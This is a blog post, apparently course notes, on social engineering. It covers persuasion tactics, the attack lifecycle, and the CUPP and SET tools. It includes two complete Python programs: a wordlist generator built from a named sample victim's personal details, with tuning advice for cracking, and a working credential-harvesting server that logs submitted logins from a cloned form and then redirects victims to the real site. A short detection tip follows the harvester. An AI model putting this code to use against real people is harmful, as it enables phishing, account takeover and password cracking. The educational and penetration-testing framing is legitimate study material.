DEV Community

Timothy Imanuel

Week 8

Social Engineering (Session 8 Notes)


The Psychology of the Attack

Social engineering targets human psychology rather than software: it works on how people perceive and react (the session lists the senses in play as sight, hearing, taste, touch, smell, balance and acceleration, temperature, kinesthetic sense, pain, and direction). The goal is to obtain confidential information through ordinary human communication, and every method below depends on first establishing a relationship of "trust" with the victim.

Two common tactics are used to guide these conversations:

  • Interview: a structured, cooperative line of questioning used to gather initial data from a subject.
  • Interrogation: a more intensive, direct method used to extract specific information from the target.


The Social Engineering Lifecycle

An effective social engineering engagement follows a clearly defined, iterative four-stage attack process:
[ Intelligence gathering ] --> [ Identifying vulnerable points ] --> [ Planning the Attack ] --> [ Execution ]

  1. Intelligence gathering: Collecting open-source background data regarding the target organization or individual.
  2. Identifying vulnerable points: Analyzing the gathered intelligence to isolate human, technical, or procedural weaknesses.
  3. Planning the Attack: Designing a highly believable scenario or pretext tailored specifically to exploit those weaknesses.
  4. Execution: Launching the designed operation to capture credentials, sensitive data, or gain initial system access.

🎭 Core Attack Methods (Psychological Triggers)

Attackers manipulate natural human biases and social constraints to bypass logical defenses using specific methods:

  • Impersonation: Pretending to be an authorized entity, employee, or trusted identity to deceive the victim.
  • Reciprocation: Doing the target a small favour first (a piece of information, some help, a gift) so that they feel obliged to return it, typically by answering a question or granting a request they would otherwise refuse.
  • Influential Authority: Leveraging a real or perceived position of high status or corporate power to command compliance.
  • Scarcity: Creating an artificial sense of urgency or limited availability to force a rushed, unverified decision.
  • Social Relationship: Exploiting natural human tendencies to cooperate with people within a shared social network or established rapport.

🛠️ The Technical Toolkit

To automate and scale these psychological vectors, penetration testers use dedicated open-source utilities to profile targets and deploy credential capture systems.

1. Common User Passwords Profiler (CUPP)

The Common User Passwords Profiler (CUPP) generates a custom password dictionary from what is known about the target: the personal details, relationships and habits that people commonly reuse in passwords. It does not find passwords by itself; the list it produces is fed to a dictionary attack against the target's accounts.

By running the tool in interactive mode, ./cupp.py -i, the tester enters what is known about the victim and CUPP builds a customized password dictionary from it:

  • Name and Surname: The target's legal name identifiers (e.g., Name: Karen, Surname: Smith).
  • Nickname: The target's common online handle or casual name (e.g., karsmith).
  • Birthdate: Formatted explicitly as DDMMYYYY (e.g., 03101976).
  • Wife's (husband's) details: The spouse's name, nickname and birthdate.
  • Child's details: The child's name (e.g., Rohan) and birthdate.
  • Pet's name: The identifier of the target's pet (e.g., Katie).

Note: If you do not know all the information, simply press Enter at a prompt to skip that field; CUPP builds the list from whatever was supplied.
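The following is an added example, not CUPP's own code: a small profile-driven wordlist generator that takes the same kinds of fields CUPP prompts for and derives candidates the way the tool does (casing variants of each name, name and surname run together, birth years and dates as prefixes or suffixes, trailing special characters, and optional leet substitutions). The sample profile is constructed from the values in the notes above; the partner's name and the child's birthdate are assumptions, and the blank partner birthdate shows what skipping a prompt with Enter amounts to.

```python
"""
Profile-driven wordlist generator in the spirit of CUPP's interactive mode.
Added example; not CUPP's own code.
"""
from itertools import product

# Constructed sample profile mirroring the fields in the notes above.
PROFILE = {
    "name": "Karen",
    "surname": "Smith",
    "nickname": "karsmith",
    "birthdate": "03101976",        # DDMMYYYY, as CUPP expects
    "partner": "John",              # assumption: spouse's name
    "partner_birthdate": "",        # unknown: left blank, like pressing Enter in CUPP
    "child": "Rohan",
    "child_birthdate": "12052005",  # assumption
    "pet": "Katie",
}

SPECIAL_SUFFIXES = ["!", "@", "#", "$", "123", "1234"]
LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"})
NAME_FIELDS = ("name", "surname", "nickname", "partner", "child", "pet")
DATE_FIELDS = ("birthdate", "partner_birthdate", "child_birthdate")


def date_parts(ddmmyyyy: str) -> list:
    """Split a DDMMYYYY string into the fragments people put in passwords.
    Anything that is not exactly eight digits is treated as unknown."""
    if len(ddmmyyyy) != 8 or not ddmmyyyy.isdigit():
        return []
    dd, mm, yyyy = ddmmyyyy[:2], ddmmyyyy[2:4], ddmmyyyy[4:]
    return [yyyy, yyyy[2:], dd + mm, mm + dd, dd + mm + yyyy, yyyy + mm + dd]


def case_variants(word: str) -> set:
    """lower / Capitalized / UPPER forms of one word."""
    return {word.lower(), word.capitalize(), word.upper()}


def build_wordlist(profile: dict, min_len: int = 6, max_len: int = 16,
                   leet: bool = True) -> list:
    """Return a sorted, de-duplicated candidate list for the given profile."""
    words = set()
    for key in NAME_FIELDS:
        value = profile.get(key, "").strip()
        if value:
            words |= case_variants(value)
    # Name and surname run together in both orders (karensmith, SmithKaren, ...).
    first, last = profile.get("name", "").strip(), profile.get("surname", "").strip()
    if first and last:
        words |= case_variants(first + last) | case_variants(last + first)

    dates = [part for key in DATE_FIELDS for part in date_parts(profile.get(key, ""))]

    candidates = set(words)
    for word, date in product(words, dates):
        candidates.add(word + date)            # Karen1976, katie0310
        candidates.add(date + word)            # 1976karen
    for word, suffix in product(words, SPECIAL_SUFFIXES):
        candidates.add(word + suffix)          # karsmith123
    for word, date, suffix in product(words, dates, SPECIAL_SUFFIXES):
        candidates.add(word + date + suffix)   # Rohan2005!
    if leet:
        candidates |= {c.translate(LEET) for c in candidates}  # K4r3n1976

    return sorted(c for c in candidates if min_len <= len(c) <= max_len)


if __name__ == "__main__":
    wordlist = build_wordlist(PROFILE)
    with open("karen.txt", "w", encoding="utf-8") as fh:
        fh.write("\n".join(wordlist) + "\n")
    print(f"{len(wordlist)} candidates written to karen.txt")
```

The length filter is the part worth tuning: most password policies reject anything under eight characters, so raising min_len trims the list before it is handed to a cracking tool, and the same profile can be regenerated with a different filter once the target's policy is known.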

2. Social-Engineer Toolkit (SET)

The Social-Engineer Toolkit (SET) is a Python framework for building social engineering attacks. In the BackTrack layout used in the session it lives under /pentest/exploits/SET/ and is launched with ./set (current Kali builds ship it as the setoolkit command). Its main menu offers several attack options, including:

  • Automatic E-Mail Attacks: Automated options for crafting phishing email campaigns.
  • Website Attack Vectors: Web-based attack channels such as Java Applet Attacks, Metasploit Browser Exploits, Tabnabbing, and Web Jacking.
  • Credential Harvester Attack Method: A website attack vector that clones a login page, captures every parameter the victim POSTs to the clone (credentials included), writes them to a report, and redirects the victim to the legitimate site so the attempt looks like an ordinary failed login.
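To make concrete what the Credential Harvester Attack Method does under the hood, here is an added example (not SET's own code): a minimal harvester that serves a login form, records every field the victim POSTs into a line-delimited JSON report, and bounces the victim to the site being imitated. The cloned page is a constructed stand-in (SET fetches and rewrites the real one), REAL_SITE is a placeholder URL, and the field names treated as credential-like are an assumption.

```python
"""
Minimal credential-harvester server showing the mechanism behind SET's
'Credential Harvester Attack Method'. Added example; not SET's code.
"""
import json
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

REAL_SITE = "https://login.example.com/"   # assumption: the site the clone imitates
REPORT_PATH = "harvester_report.jsonl"
# Assumption: substrings that mark a posted field as credential-like.
CREDENTIAL_HINTS = ("user", "login", "email", "pass", "pwd", "pin", "otp", "token")

# Constructed stand-in for a cloned page; SET would clone the real login page.
CLONE_HTML = b"""<html><body><form method="POST" action="/login">
<input name="username"><input name="password" type="password">
<input type="submit" value="Sign in"></form></body></html>"""


def harvest(raw_body: bytes, client: str, path: str, when: float) -> dict:
    """Turn a url-encoded POST body into one report entry.
    Every posted parameter is kept, as in SET's report; fields whose names look
    like credentials are listed separately so the report is quick to scan."""
    fields = {k: v[0] if len(v) == 1 else v
              for k, v in parse_qs(raw_body.decode("utf-8", "replace"),
                                   keep_blank_values=True).items()}
    flagged = [k for k in fields if any(h in k.lower() for h in CREDENTIAL_HINTS)]
    return {"time": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(when)),
            "client": client, "path": path,
            "fields": fields, "credential_like": flagged}


def append_report(entry: dict, path: str = REPORT_PATH) -> None:
    """Append one entry as a JSON line; the report is the file itself."""
    with open(path, "a", encoding="utf-8") as fh:
        fh.write(json.dumps(entry) + "\n")


class Harvester(BaseHTTPRequestHandler):
    def do_GET(self):
        # Serve the clone for any path so links on the cloned page still work.
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(CLONE_HTML)))
        self.end_headers()
        self.wfile.write(CLONE_HTML)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length)
        append_report(harvest(body, self.client_address[0], self.path, time.time()))
        # Bounce to the real site: the victim just sees a fresh login prompt.
        self.send_response(302)
        self.send_header("Location", REAL_SITE)
        self.end_headers()


if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8080), Harvester).serve_forever()
```

The two things this makes visible are also the defender's tells: the form submits to an origin that is not the site it imitates, and the only response to a submission is a redirect to the genuine login page. Proxy logs showing a POST with credential-like parameters followed by a 302 to a different domain are worth alerting on.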
